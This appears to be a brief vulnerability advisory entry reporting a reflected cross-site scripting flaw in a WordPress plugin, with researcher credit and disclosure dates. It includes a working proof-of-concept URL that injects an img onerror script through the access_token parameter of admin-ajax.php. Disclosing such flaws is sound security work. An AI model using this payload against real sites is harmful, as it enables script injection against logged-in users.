The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
Against any authenticated user: https://example.com/wp-admin/admin-ajax.php?action=fts_encrypt_token_ajax&access_token=%3Cimg%20src=x%20onerror=alert(/XSS/)%3E
Krzysztof Zając
Krzysztof Zając
Yes
2022-07-26 (about 6 months ago)
2022-07-26 (about 6 months ago)
2022-08-25 (about 5 months ago)